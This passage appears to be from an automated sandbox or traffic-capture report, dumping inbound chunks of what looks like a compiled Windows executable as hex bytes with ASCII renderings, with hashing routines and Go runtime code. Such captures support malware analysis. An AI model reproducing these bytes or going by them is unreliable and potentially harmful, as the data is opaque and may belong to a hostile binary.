0f db cc 66 45 0f db d4 66 45 0f db dc 66 0f ef c4 66 0f ef cd 66 0f ef d6 66 0f ef df 66 41 0f ef c0 66 41 0f ef c9 66 41 0f ef d2 66 41 0f ef db 48 ff c8 0f 85 5b ff ff ff f3 0f 7f 02 f3 0f 7f 4a Data Ascii: b@jPHD$8H\|$ HT$fEfEvfEfDnfEpffffHEoEofEfEvo'ooow o0DoG@DoOPDoW`Do_pHfAfAfAfAEofEfEvfEfEfEfEfffffAfAfAfAH[J
2022-11-07 22:48:53 UTC	1120	IN	Data Raw: 04 30 48 81 f9 80 00 00 00 7c 73 48 89 ce 48 83 e1 80 49 39 c9 0f 82 5c 01 00 00 4c 89 4c 24 68 48 89 74 24 30 48 89 44 24 38 48 89 4c 24 28 48 89 1c 24 48 89 44 24 08 48 89 4c 24 10 4c 89 4c 24 18 e8 86 08 00 00 48 8b 4c 24 30 48 8b 44 24 28 48 39 c1 0f 82 18 01 00 00 48 8b 54 24 68 48 89 c3 48 29 d0 48 89 ca 48 29 d9 48 c1 f8 3f 48 21 d0 48 83 e0 80 48 8b 54 24 38 48 01 d0 48 85 c9 7e 25 48 81 f9 80 00 00 00 ba 80 00 00 00 48 0f 4c d1 48 8b 4c 24 50 48 8d 59 40 48 39 c3 75 23 48 89 91 c0 00 00 00 48 8b 44 24 60 48 89 44 24 70 0f 57 c0 0f 11 44 24 78 48 8b 6c 24 40 48 83 c4 48 c3 48 89 54 24 30 48 89 1c 24 48 89 44 24 08 48 89 54 24 10 e8 91 2b f5 ff 48 8b 4c 24 50 48 8b 54 24 30 eb b9 48 89 1c 24 48 8d 43 40 48 89 44 24 08 48 c7 44 24 10 80 00 00 00 48 Data Ascii: 0H\|sHHI9\LL$hHt$0HD$8HL$(H$HD$HL$LL$HL$0HD$(H9HT$hHH)HH)H?H!HHT$8HH~%HHLHL$PHY@H9u#HHD$`HD$pWD$xHl$@HHHT$0H$HD$HT$+HL$PHT$0H$HC@HD$HD$H
2022-11-07 22:48:53 UTC	1136	IN	Data Raw: 48 c1 c9 3d 48 c1 ea 06 48 8b 9d b8 01 00 00 48 31 c8 48 89 d9 48 31 d0 48 d1 cb 48 89 ca 48 c1 ea 07 48 c1 c9 08 48 03 85 f8 01 00 00 48 31 cb 48 31 d3 48 03 9d b0 01 00 00 48 01 d8 48 89 85 30 02 00 00 48 ba ae 0d f9 be 04 98 3f 11 49 01 c1 4c 89 f0 49 01 d1 4c 89 f1 48 c1 c8 0e 4c 89 f2 48 c1 c9 12 48 31 c8 4c 89 f1 48 c1 ca 29 4c 21 f9 48 31 c2 4c 89 f0 48 f7 d0 49 01 d1 4c 21 c0 48 31 c8 4c 01 c8 4c 89 d7 4c 89 e3 48 c1 cf 1c 4c 89 d2 4c 21 db 48 c1 ca 22 4c 89 d1 4c 21 e1 48 31 d7 48 31 cb 4c 89 d2 4c 89 d9 48 c1 ca 27 4c 21 d1 48 31 cb 48 31 d7 48 01 fb 49 89 d9 49 01 c5 49 01 c1 48 8b 85 28 02 00 00 48 89 c1 48 c1 c8 13 48 89 ca 48 c1 c9 3d 48 c1 ea 06 48 8b 9d c0 01 00 00 48 31 c8 48 89 d9 48 31 d0 48 d1 cb 48 89 ca 48 c1 ea 07 48 c1 c9 08 48 03 Data Ascii: H=HHH1HH1HHHHHH1H1HHH0H?ILILHLHH1LH)L!H1LHIL!H1LLLHLL!H"LL!H1H1LLH'L!H1H1HIIIH(HHHH=HHH1HH1HHHHH
2022-11-07 22:48:53 UTC	1152	IN	Data Raw: 24 10 0f 10 84 24 50 05 00 00 0f 11 44 24 18 0f 10 84 24 60 05 00 00 0f 11 44 24 28 0f 10 84 24 70 05 00 00 0f 11 44 24 38 0f 1f 40 00 e8 9b 37 00 00 80 7c 24 48 00 74 35 31 c0 31 c9 48 8b 94 24 48 05 00 00 48 89 94 24 80 05 00 00 48 89 84 24 88 05 00 00 48 89 8c 24 90 05 00 00 48 8b ac 24 08 05 00 00 48 81 c4 10 05 00 00 90 c3 48 8d 05 36 47 1c 00 48 89 04 24 48 c7 44 24 08 12 00 00 00 e8 c6 ab ee ff 48 8b 4c 24 10 48 8d 05 7a 97 21 00 eb a8 48 89 84 24 a0 00 00 00 48 89 8c 24 a0 01 00 00 48 8b 90 98 00 00 00 48 89 0c 24 ff d2 48 83 7c 24 08 14 0f 84 a1 36 00 00 31 c0 84 c0 0f 84 d2 09 00 00 48 8b 84 24 30 05 00 00 48 89 04 24 48 8b 8c 24 38 05 00 00 48 89 4c 24 08 48 8b 94 24 40 05 00 00 48 89 54 24 10 48 8b 9c 24 48 05 00 00 48 89 5c 24 18 e8 cd f1 ff Data Ascii: $$PD$$`D$($pD$8@7\|$Ht511H$HH$H$H$H$HH6GH$HD$HL$Hz!H$H$HH$H\|$61H$0H$H$8HL$H$@HT$H$HH\$
2022-11-07 22:48:53 UTC	1168	IN	Data Raw: fe 07 e9 ea fe ff ff 48 83 fe 07 49 bb 61 70 70 6c 69 63 61 74 e9 d7 fe ff ff 48 83 fe 0b e9 16 fe ff ff 48 83 fe 0b e9 0d fe ff ff 90 48 83 fe 04 0f 82 3b 02 00 00 48 8d 46 fc 48 89 c1 48 f7 d8 48 c1 f8 3f 48 83 e0 04 48 01 d8 48 89 04 24 48 89 4c 24 08 e8 13 ae f9 ff 48 8b 44 24 10 48 83 7c 24 18 00 74 1e 48 8b 44 24 48 48 8b 4c 24 78 48 8b 54 24 68 48 bf 6f 70 74 69 6f 6e 61 6c e9 a9 fb ff ff 48 89 44 24 58 48 8d 05 7c 70 16 00 48 89 04 24 e8 93 9d ee ff 48 8b 44 24 08 48 89 84 24 b0 00 00 00 48 8b 4c 24 58 48 89 08 eb b6 48 89 1c 24 48 8d 05 96 c5 1b 00 48 89 44 24 08 48 c7 44 24 10 04 00 00 00 0f 1f 00 e8 fb e1 ed ff 44 0f b6 5c 24 18 48 8b 44 24 48 48 8b 4c 24 78 48 8b 54 24 68 48 8b 5c 24 70 48 8b 74 24 50 48 bf 6f 70 74 69 6f 6e 61 6c 49 b8 65 78 Data Ascii: HIapplicatHHH;HFHHH?HHH$HL$HD$H\|$tHD$HHL$xHT$hHoptionalHD$XH\|pH$HD$H$HL$XHH$HHD$HD$D\$HD$HHL$xHT$hH\$pHt$PHoptionalIex
2022-11-07 22:48:53 UTC	1184	IN	Data Raw: c3 48 89 f8 48 89 f7 e8 01 20 f4 ff 48 89 c7 eb b8 48 89 04 24 48 89 54 24 08 48 89 54 24 10 e8 c9 2c ee ff 48 8b 44 24 18 48 8d 0d 1d 38 21 00 48 89 8c 24 68 02 00 00 48 89 84 24 70 02 00 00 0f 57 c0 0f 11 84 24 78 02 00 00 48 8b ac 24 10 02 00 00 48 81 c4 18 02 00 00 c3 48 8b 8c 24 20 02 00 00 48 89 0c 24 48 8b 8c 24 28 02 00 00 48 89 4c 24 08 48 8b 8c 24 30 02 00 00 48 89 4c 24 10 48 89 44 24 18 e8 e2 e6 fa ff 48 8b 44 24 20 48 89 84 24 10 01 00 00 48 8b 4c 24 28 48 89 8c 24 18 01 00 00 48 8b 54 24 30 48 89 94 24 d8 00 00 00 48 8b 9c 24 88 00 00 00 48 8b 5b 50 48 8b b4 24 f8 00 00 00 48 89 34 24 48 8b b4 24 90 00 00 00 48 89 74 24 08 ff d3 48 8b 44 24 10 48 89 84 24 a8 01 00 00 48 8d bc 24 b0 01 00 00 48 8d 74 24 18 48 89 6c 24 f0 48 8d 6c 24 f0 e8 57 Data Ascii: HH HH$HT$HT$,HD$H8!H$hH$pW$xH$HH$ H$H$(HL$H$0HL$HD$HD$ H$HL$(H$HT$0H$H$H[PH$H4$H$Ht$HD$H$H$Ht$Hl$Hl$W
2022-11-07 22:48:53 UTC	1200	IN	Data Raw: 24 38 00 00 00 00 48 8b 84 24 c8 00 00 00 48 89 04 24 48 8d 44 24 38 48 89 44 24 08 e8 0c 06 00 00 80 7c 24 10 00 0f 84 e6 00 00 00 48 8b 84 24 d0 00 00 00 48 85 c0 0f 84 29 02 00 00 90 80 3d c8 95 38 00 00 0f 84 0e 02 00 00 48 89 05 c3 95 38 00 83 3d e4 c9 3b 00 00 0f 85 e1 01 00 00 48 8b 8c 24 d8 00 00 00 48 89 0d af 95 38 00 48 89 44 24 48 48 89 4c 24 50 48 8b 54 24 48 48 85 d2 0f 84 ac 01 00 00 0f b6 5a 17 89 de 83 e3 1f 48 89 df 48 0f ba eb 07 40 f6 c6 20 48 0f 44 fb 90 90 48 89 cb 48 89 14 24 48 89 4c 24 08 48 89 7c 24 10 e8 f6 a4 fa ff 48 8b 44 24 18 48 8b 4c 24 28 48 8b 54 24 38 90 48 83 e1 1f 48 8d 59 fe 48 83 fb 04 0f 87 46 02 00 00 48 8b 08 48 c1 e1 03 48 8d 41 c0 48 f7 d8 48 83 f8 40 48 19 db 48 19 f6 48 f7 d9 49 89 d0 48 d3 e2 48 21 da 48 f7 Data Ascii: $8H$H$HD$8HD$\|$H$H)=8H8=;H$H8HD$HHL$PHT$HHZHH@ HDHH$HL$H\|$HD$HL$(HT$8HHYHFHHHAHH@HHHIHH!H
2022-11-07 22:48:53 UTC	1216	IN	Data Raw: ff bb 01 00 00 00 e9 16 ff ff ff 80 39 00 74 0c 48 c7 c2 ff ff ff ff e9 d9 fe ff ff ba 01 00 00 00 e9 cf fe ff ff e8 42 82 f3 ff 66 90 e9 5b fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 8d 44 24 88 48 3b 41 10 0f 86 e1 06 00 00 48 81 ec f8 00 00 00 48 89 ac 24 f0 00 00 00 48 8d ac 24 f0 00 00 00 48 8b 84 24 18 01 00 00 48 89 04 24 48 8b 84 24 20 01 00 00 48 89 44 24 08 48 8b 84 24 28 01 00 00 48 89 44 24 10 48 8b 84 24 08 01 00 00 48 89 44 24 18 48 8b 8c 24 10 01 00 00 48 89 4c 24 20 e8 65 f1 ff ff 48 8b 44 24 28 48 89 84 24 b0 00 00 00 48 8b 8c 24 08 01 00 00 48 8b 51 30 48 8b 9c 24 10 01 00 00 48 89 1c 24 ff d2 48 8b 44 24 08 48 8b 40 08 48 89 84 24 b8 00 00 Data Ascii: 9tHBf[eH%(HHD$H;AHH$H$H$H$H$ HD$H$(HD$H$HD$H$HL$ eHD$(H$H$HQ0H$H$HD$H@H$
2022-11-07 22:48:53 UTC	1232	IN	Data Raw: 44 24 08 e8 05 fc ff ff 48 8b ac 24 88 00 00 00 48 81 c4 90 00 00 00 c3 e8 50 42 f3 ff e9 eb fe ff ff cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 c6 00 00 00 48 83 ec 28 48 89 6c 24 20 48 8d 6c 24 20 48 8b 44 24 38 84 00 48 8b 4c 24 30 84 01 48 89 04 24 48 8d 51 28 48 89 54 24 18 48 89 54 24 08 48 89 4c 24 10 e8 ce db ff ff 48 8b 44 24 38 48 8d 48 28 48 89 0c 24 48 8b 4c 24 18 48 89 4c 24 08 48 8b 4c 24 30 48 89 4c 24 10 e8 28 dc ff ff 48 8b 44 24 38 48 8d 48 50 48 8b 54 24 30 48 8d 5a 50 48 39 d9 74 17 48 89 0c 24 48 89 5c 24 08 48 c7 44 24 10 28 00 00 00 e8 9a 6b f3 ff 48 8b 44 24 38 48 83 c0 78 48 89 04 24 48 8b 44 24 30 48 83 c0 78 48 89 44 24 08 48 8d 05 38 13 34 00 48 89 44 24 10 e8 2e e4 ff ff Data Ascii: D$H$HPBeH%(HH;aH(Hl$ Hl$ HD$8HL$0H$HQ(HT$HT$HL$HD$8HH(H$HL$HL$HL$0HL$(HD$8HHPHT$0HZPH9tH$H\$HD$(kHD$8HxH$HD$0HxHD$H84HD$.
2022-11-07 22:48:53 UTC	1248	IN	Data Raw: 01 e2 4d 69 e0 18 2d 07 00 4c 01 e0 4d 69 e0 67 fb 09 00 4c 01 e7 4d 69 e0 ad 39 0f 00 4d 29 e5 4d 69 e0 d1 15 02 00 4c 01 e1 4d 69 c0 7d 6f 0a 00 4c 29 c2 48 89 54 24 68 4d 69 c1 13 2c 0a 00 4d 01 d8 4d 69 d9 18 2d 07 00 4d 01 da 4d 69 d9 67 fb 09 00 4c 01 d8 4d 69 d9 ad 39 0f 00 4c 29 df 4d 69 d9 d1 15 02 00 4d 01 eb 4d 69 c9 7d 6f 0a 00 4c 29 c9 48 89 4c 24 70 4c 8b 4c 24 40 4d 69 e1 13 2c 0a 00 4c 8b 6c 24 10 4d 01 ec 4d 69 e9 18 2d 07 00 4d 01 e8 4d 69 e9 67 fb 09 00 4d 01 ea 4d 69 e9 ad 39 0f 00 4c 29 e8 4d 69 e9 d1 15 02 00 4c 01 ef 4d 69 c9 7d 6f 0a 00 4d 29 cb 4c 8b 4c 24 48 4d 69 e9 13 2c 0a 00 4c 8b 74 24 18 4f 8d 7c 35 00 49 69 f1 18 2d 07 00 4c 01 e6 4d 69 e1 67 fb 09 00 4b 8d 1c 04 49 69 d1 ad 39 0f 00 49 29 d2 49 69 d1 d1 15 02 00 48 8d 0c Data Ascii: Mi-LMigLMi9M)MiLMi}oL)HT$hMi,MMi-MMigLMi9L)MiMMi}oL)HL$pLL$@Mi,Ll$MMi-MMigMMi9L)MiLMi}oM)LL$HMi,Lt$O\|5Ii-LMigKIi9I)IiH
2022-11-07 22:48:53 UTC	1264	IN	Data Raw: 00 48 89 5c 24 10 48 8b 9c 24 a8 00 00 00 48 89 5c 24 18 ff d1 48 8b 84 24 d0 00 00 00 48 8b 48 38 48 8b 94 24 d8 00 00 00 48 89 14 24 48 8b 9c 24 b8 00 00 00 48 89 5c 24 08 48 8b b4 24 c0 00 00 00 48 89 74 24 10 48 8b bc 24 c8 00 00 00 48 89 7c 24 18 ff d1 48 8b 84 24 d0 00 00 00 48 8b 48 30 48 8b 94 24 d8 00 00 00 48 89 14 24 48 8b 5c 24 60 48 8b 74 24 58 48 29 f3 49 89 d8 48 f7 db 48 c1 fb 3f 48 21 f3 4c 8b 8c 24 80 00 00 00 4c 01 cb 48 89 5c 24 08 48 c7 44 24 10 00 00 00 00 4c 89 44 24 18 ff d1 48 8b 44 24 20 48 89 44 24 78 48 8b 4c 24 28 48 89 4c 24 48 48 8b 54 24 30 48 89 54 24 50 48 8b 9c 24 d0 00 00 00 48 8b 73 20 48 8b bc 24 d8 00 00 00 48 89 3c 24 ff d6 48 8b 44 24 70 48 8d 48 fe 48 8b 54 24 58 48 39 d1 0f 83 48 02 00 00 48 8b 9c 24 80 00 00 00 Data Ascii: H\$H$H\$H$HH8H$H$H$H\$H$Ht$H$H\|$H$HH0H$H$H\$`Ht$XH)IHH?H!L$LH\$HD$LD$HD$ HD$xHL$(HL$HHT$0HT$PH$Hs H$H<$HD$pHHHT$XH9HH$
2022-11-07 22:48:53 UTC	1280	IN	Data Raw: 10 0f 86 b4 00 00 00 48 83 ec 28 48 89 6c 24 20 48 8d 6c 24 20 48 8d 05 f1 ba 14 00 48 89 04 24 48 c7 44 24 08 10 00 00 00 48 c7 44 24 10 10 00 00 00 e8 16 b9 f0 ff 48 8b 44 24 18 8b 4c 24 30 31 d2 eb 50 48 8d 1d b2 3e 33 00 0f b6 34 13 8d 7e 04 40 80 ff 20 45 19 c0 44 8d 4e e0 41 f7 d9 41 80 f9 20 45 19 c9 41 89 ca 89 f9 45 89 d3 41 d3 e2 45 21 c2 41 c1 ea 04 41 c1 e3 04 f7 de 89 f1 41 d3 eb 45 21 cb 45 09 da 44 89 14 90 48 ff c2 44 89 d1 48 83 fa 10 7c aa 48 89 44 24 38 48 c7 44 24 40 10 00 00 00 48 c7 44 24 48 10 00 00 00 48 8b 6c 24 20 48 83 c4 28 c3 e8 ad 81 f2 ff e9 28 ff ff ff cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 16 02 00 00 48 83 ec 60 48 89 6c 24 58 48 8d 6c 24 58 8b 15 12 88 3a 00 85 d2 0f 84 Data Ascii: H(Hl$ Hl$ HH$HD$HD$HD$L$01PH>34~@ EDNAA EAEAE!AAAE!EDHDH\|HD$8HD$@HD$HHl$ H((eH%(HH;aH`Hl$XHl$X:
2022-11-07 22:48:53 UTC	1296	IN	Data Raw: c0 1e 44 01 ca 41 89 e8 41 c1 c0 05 42 8d 94 12 dc bc 1b 8f 44 01 c2 44 8b 54 24 24 44 33 54 24 18 44 33 54 24 04 44 33 54 24 2c 41 d1 c2 44 89 54 24 24 41 89 e8 41 09 c0 41 21 d8 41 89 e9 41 21 c1 45 09 c1 c1 c5 1e 44 01 c9 41 89 d0 41 c1 c0 05 42 8d 8c 11 dc bc 1b 8f 44 01 c1 44 8b 54 24 28 44 33 54 24 1c 44 33 54 24 08 44 33 54 24 30 41 d1 c2 44 89 54 24 28 41 89 d0 41 09 e8 41 21 c0 41 89 d1 41 21 e9 45 09 c1 c1 c2 1e 44 01 cb 41 89 c8 41 c1 c0 05 42 8d 9c 13 dc bc 1b 8f 44 01 c3 44 8b 54 24 2c 44 33 54 24 20 44 33 54 24 0c 44 33 54 24 34 41 d1 c2 44 89 54 24 2c 41 89 c8 41 09 d0 41 21 e8 41 89 c9 41 21 d1 45 09 c1 c1 c1 1e 44 01 c8 41 89 d8 41 c1 c0 05 42 8d 84 10 dc bc 1b 8f 44 01 c0 44 8b 54 24 30 44 33 54 24 24 44 33 54 24 10 44 33 54 24 38 41 d1 Data Ascii: DAABDDT$$D3T$D3T$D3T$,ADT$$AAA!AA!EDAABDDT$(D3T$D3T$D3T$0ADT$(AAA!AA!EDAABDDT$,D3T$ D3T$D3T$4ADT$,AAA!AA!EDAABDDT$0D3T$$D3T$D3T$8A
2022-11-07 22:48:53 UTC	1312	IN	Data Raw: 44 89 d2 c1 c9 0b 31 c8 44 89 d1 c1 ca 19 44 21 d9 31 c2 44 89 d0 f7 d0 41 01 d5 44 21 e0 31 c8 44 01 e8 44 89 f7 44 89 c3 c1 cf 02 44 89 f2 44 21 fb c1 ca 0d 44 89 f1 44 21 c1 31 d7 31 cb 44 89 f2 44 89 f9 c1 ca 16 44 21 f1 31 cb 31 d7 01 fb 41 89 dd 41 01 c1 41 01 c5 8b 45 44 89 c1 c1 c8 11 89 ca c1 c9 13 c1 ea 0a 8b 5d 10 31 c8 89 d9 31 d0 c1 cb 07 89 ca c1 ea 03 c1 c9 12 03 45 30 31 cb 31 d3 03 5d 0c 01 d8 89 45 4c 41 01 c4 44 89 c8 41 81 c4 cc a1 0c 24 44 89 c9 c1 c8 06 44 89 ca c1 c9 0b 31 c8 44 89 c9 c1 ca 19 44 21 d1 31 c2 44 89 c8 f7 d0 41 01 d4 44 21 d8 31 c8 44 01 e0 44 89 ef 44 89 fb c1 cf 02 44 89 ea 44 21 f3 c1 ca 0d 44 89 e9 44 21 f9 31 d7 31 cb 44 89 ea 44 89 f1 c1 ca 16 44 21 e9 31 cb 31 d7 01 fb 41 89 dc 41 01 c0 41 01 c4 8b 45 48 89 c1 Data Ascii: D1DD!1DAD!1DDDDD!DD!11DDD!11AAAED]11E011]ELADA$DD1DD!1DAD!1DDDDD!DD!11DDD!11AAAEH
2022-11-07 22:48:53 UTC	1328	IN	Data Raw: 00 00 00 48 89 34 24 48 29 cf 48 89 fa 48 f7 df 48 c1 ff 3f 48 21 cf 48 8b 9c 24 b8 00 00 00 48 01 df 48 89 7c 24 08 48 8b 7c 24 68 48 89 7c 24 10 48 89 54 24 18 48 8b 94 24 d0 00 00 00 48 89 54 24 20 48 8b bc 24 d8 00 00 00 48 89 7c 24 28 4c 8b 84 24 e0 00 00 00 4c 89 44 24 30 4c 8b 4c 24 60 4c 89 4c 24 38 e8 61 f6 ff ff 48 8b 44 24 50 48 8b 4c 24 58 48 8b 54 24 40 48 8b 5c 24 48 48 8b b4 24 88 00 00 00 48 01 f3 66 90 48 85 c0 75 31 48 8b b4 24 b0 00 00 00 48 8b bc 24 c8 00 00 00 4c 8b 8c 24 b8 00 00 00 49 89 d8 48 8b 9c 24 c0 00 00 00 49 89 c2 48 89 d0 4c 89 d2 e9 d0 fd ff ff 48 89 9c 24 e8 00 00 00 48 89 84 24 f0 00 00 00 48 89 8c 24 f8 00 00 00 48 8b ac 24 a0 00 00 00 48 81 c4 a8 00 00 00 c3 48 c1 e0 3a 49 c1 e3 34 4c 09 d8 49 c1 e0 2e 4c 09 c0 49 c1 Data Ascii: H4$H)HHH?H!H$HH\|$H\|$hH\|$HT$H$HT$ H$H\|$(L$LD$0LL$`LL$8aHD$PHL$XHT$@H\$HH$HfHu1H$H$L$IH$IHLH$H$H$H$HH:I4LI.LI
2022-11-07 22:48:53 UTC	1344	IN	Data Raw: e8 a8 f4 ff ff 48 8b 84 24 00 01 00 00 48 8b 8c 24 10 01 00 00 48 8d 14 01 48 89 94 24 28 01 00 00 48 8b 9c 24 f8 00 00 00 4c 8b 84 24 18 01 00 00 4c 39 c2 0f 87 b4 00 00 00 48 8b b4 24 30 01 00 00 48 39 ca 0f 82 8c 02 00 00 48 89 b4 24 30 01 00 00 4c 89 84 24 18 01 00 00 48 8d 15 ab f4 13 00 48 89 14 24 48 89 ca 4c 29 c1 48 8d 14 52 48 c1 e2 03 48 c1 f9 3f 48 21 ca 48 8d 0c 16 48 89 4c 24 08 48 89 44 24 10 48 89 5c 24 18 48 89 44 24 20 e8 55 4d ec ff 48 8b 84 24 30 01 00 00 48 89 04 24 48 8b 84 24 28 01 00 00 48 89 44 24 08 48 8b 84 24 18 01 00 00 48 89 44 24 10 e8 ea de ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 89 84 24 a8 02 00 00 48 89 8c 24 b0 02 00 00 48 8b ac 24 a0 01 00 00 48 81 c4 a8 01 00 00 90 c3 48 89 84 24 20 01 00 00 48 89 9c 24 40 01 00 00 48 Data Ascii: H$H$HH$(H$L$L9H$0H9H$0L$HH$HL)HRHH?H!HHL$HD$H\$HD$ UMH$0H$H$(HD$H$HD$HD$HL$ H$H$H$HH$ H$@H
2022-11-07 22:48:53 UTC	1360	IN	Data Raw: 24 78 48 8b b4 24 c8 00 00 00 48 8b bc 24 a0 00 00 00 48 ff c7 4c 8b 84 24 88 00 00 00 49 39 f8 0f 8f b8 fe ff ff 0f 1f 80 00 00 00 00 48 85 db 0f 85 35 01 00 00 48 8b 05 c0 0b 36 00 48 8b 0d c1 0b 36 00 48 8b 40 18 48 89 0c 24 90 ff d0 48 8b 44 24 08 48 89 84 24 f8 00 00 00 48 8b 4c 24 10 48 89 8c 24 a0 00 00 00 48 8b 94 24 58 01 00 00 48 8b 52 20 48 8b 9c 24 60 01 00 00 48 89 1c 24 ff d2 48 8b 44 24 08 48 89 84 24 e8 00 00 00 48 8b 4c 24 10 48 89 8c 24 98 00 00 00 48 8d 15 a9 73 15 00 48 89 14 24 0f 1f 44 00 00 e8 7b 9d eb ff 48 8b 7c 24 08 48 8b 84 24 a0 00 00 00 48 89 47 08 83 3d 73 49 39 00 00 0f 1f 00 0f 85 86 00 00 00 48 8b 84 24 f8 00 00 00 48 89 07 48 8b 84 24 98 00 00 00 48 89 47 18 83 3d 4c 49 39 00 00 75 4a 48 8b 84 24 e8 00 00 00 48 89 47 10 Data Ascii: $xH$H$HL$I9H5H6H6H@H$HD$H$HL$H$H$XHR H$`H$HD$H$HL$H$HsH$D{H\|$H$HG=sI9H$HH$HG=LI9uJH$HG
2022-11-07 22:48:53 UTC	1376	IN	Data Raw: 00 0f 85 27 03 00 00 48 89 43 28 48 8b 84 24 28 01 00 00 48 85 c0 0f 84 b6 02 00 00 48 8b 8c 24 20 01 00 00 48 89 84 24 28 01 00 00 48 89 8c 24 20 01 00 00 48 8d 15 52 0a 14 00 48 89 14 24 48 89 44 24 08 48 c7 44 24 10 00 00 00 00 e8 fb 6a eb ff 48 8b 44 24 18 83 3d df 09 39 00 00 0f 85 53 02 00 00 48 8b 8c 24 18 01 00 00 48 89 41 30 48 8d 05 96 ff 13 00 48 89 04 24 48 8b 8c 24 28 01 00 00 48 89 4c 24 08 48 c7 44 24 10 00 00 00 00 e8 b7 6a eb ff 48 8b 44 24 18 83 3d 9b 09 39 00 00 0f 85 f9 01 00 00 48 8b 8c 24 18 01 00 00 48 89 41 38 48 8b 84 24 28 01 00 00 48 85 c0 0f 8e 31 01 00 00 48 8b 94 24 20 01 00 00 31 db eb 14 48 8b 74 24 70 48 8d 56 40 48 8b 8c 24 18 01 00 00 48 89 c3 48 89 54 24 70 48 89 5c 24 58 0f 10 02 0f 11 84 24 b8 00 00 00 0f 10 42 10 0f Data Ascii: 'HC(H$(HH$ H$(H$ HRH$HD$HD$jHD$=9SH$HA0HH$H$(HL$HD$jHD$=9H$HA8H$(H1H$ 1Ht$pHV@H$HHT$pH\$X$B
2022-11-07 22:48:53 UTC	1392	IN	Data Raw: b8 00 00 00 c3 48 8d 78 10 48 8b 8c 24 c0 00 00 00 e8 b7 df f0 ff eb a3 48 89 d1 e8 0d e4 f0 ff e8 88 e3 f0 ff 90 e8 42 c2 f0 ff 66 90 e9 7b fb ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8d 05 0e 42 18 00 48 89 44 24 10 48 c7 44 24 18 02 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 eb 00 00 00 48 83 ec 50 48 89 6c 24 48 48 8d 6c 24 48 48 8b 44 24 58 48 85 c0 0f 84 b0 00 00 00 48 8b 48 08 48 8b 10 48 8b 58 10 48 85 c9 75 79 31 c9 31 d2 48 8b 58 20 48 8b 40 18 48 85 db 74 54 48 c7 04 24 00 00 00 00 48 89 54 24 08 48 89 4c 24 10 48 8d 0d a1 40 18 00 48 89 4c 24 18 48 c7 44 24 20 01 00 00 00 48 89 44 24 28 48 89 5c 24 30 e8 f3 3a ef ff 48 8b 44 24 38 Data Ascii: HxH$HBf{HBHD$HD$eH%(HH;aHPHl$HHl$HHD$XHHHHHXHuy11HX H@HtTH$HT$HL$H@HL$HD$ HD$(H\$0:HD$8
2022-11-07 22:48:53 UTC	1408	IN	Data Raw: f1 ff 48 8b 84 24 c0 01 00 00 0f 1f 00 48 85 c0 0f 84 43 06 00 00 48 8d 48 10 48 89 8c 24 a0 00 00 00 48 8d 05 04 fd 15 00 48 89 04 24 e8 fb dd ea ff 48 8b 44 24 08 48 8d 0d 6f 9e 00 00 48 89 08 48 8b 4c 24 60 48 89 48 08 83 3d ec 89 38 00 00 0f 85 db 05 00 00 48 8b 8c 24 c8 00 00 00 48 89 48 10 48 8b 8c 24 b8 00 00 00 48 89 48 18 48 8b 8c 24 e0 01 00 00 48 89 48 28 83 3d bb 89 38 00 00 0f 85 93 05 00 00 48 8b 8c 24 d8 01 00 00 48 89 48 20 48 8b 8c 24 f0 01 00 00 48 89 48 38 83 3d 96 89 38 00 00 66 0f 1f 44 00 00 0f 85 52 05 00 00 48 8b 8c 24 e8 01 00 00 48 89 48 30 48 8b 8c 24 a0 00 00 00 48 89 0c 24 48 8b 8c 24 c0 00 00 00 48 89 4c 24 08 48 8b 54 24 58 48 89 54 24 10 48 89 44 24 18 e8 a1 25 ff ff 48 8b 44 24 20 48 89 84 24 e8 00 00 00 80 7c 24 28 00 0f Data Ascii: H$HCHHH$HH$HD$HoHHL$`HH=8H$HHH$HHH$HH(=8H$HH H$HH8=8fDRH$HH0H$H$H$HL$HT$XHT$HD$%HD$ H$\|$(
2022-11-07 22:48:53 UTC	1424	IN	Data Raw: 89 fe 48 39 da 0f 8e ec 00 00 00 0f b6 3c 18 81 ff 80 00 00 00 0f 8d a4 00 00 00 48 ff c3 44 8d 47 d0 41 83 f8 09 77 7f 0f 1f 44 00 00 81 fe 00 00 00 40 73 6b 8d 34 b6 41 89 f0 d1 e6 42 8d 3c 47 8d 7f d0 39 fe 77 0a 0f 1f 44 00 00 83 ff ff 76 ae b8 ff ff ff ff 84 c9 74 33 74 0c 3d 00 00 00 40 76 05 b8 00 00 00 40 48 89 c2 48 f7 d8 0f b6 c9 48 85 c9 48 0f 45 d0 48 89 54 24 50 c6 44 24 58 00 48 8b 6c 24 30 48 83 c4 38 90 c3 3d 00 00 00 40 72 07 b8 ff ff ff 3f eb cd 84 c9 eb bb b8 ff ff ff ff eb b0 48 c7 44 24 50 00 00 00 00 c6 44 24 58 01 48 8b 6c 24 30 48 83 c4 38 c3 89 74 24 2c 48 89 04 24 48 89 54 24 08 48 89 5c 24 10 e8 57 a6 ef ff 8b 7c 24 18 48 8b 5c 24 20 48 8b 44 24 40 0f b6 4c 24 2b 48 8b 54 24 48 8b 74 24 2c e9 27 ff ff ff 89 f0 e9 59 ff ff ff 80 Data Ascii: H9<HDGAwD@sk4AB<G9wDvt3t=@v@HHHHEHT$PD$XHl$0H8=@r?HD$PD$XHl$0H8t$,H$HT$H\$W\|$H\$ HD$@L$+HT$Ht$,'Y
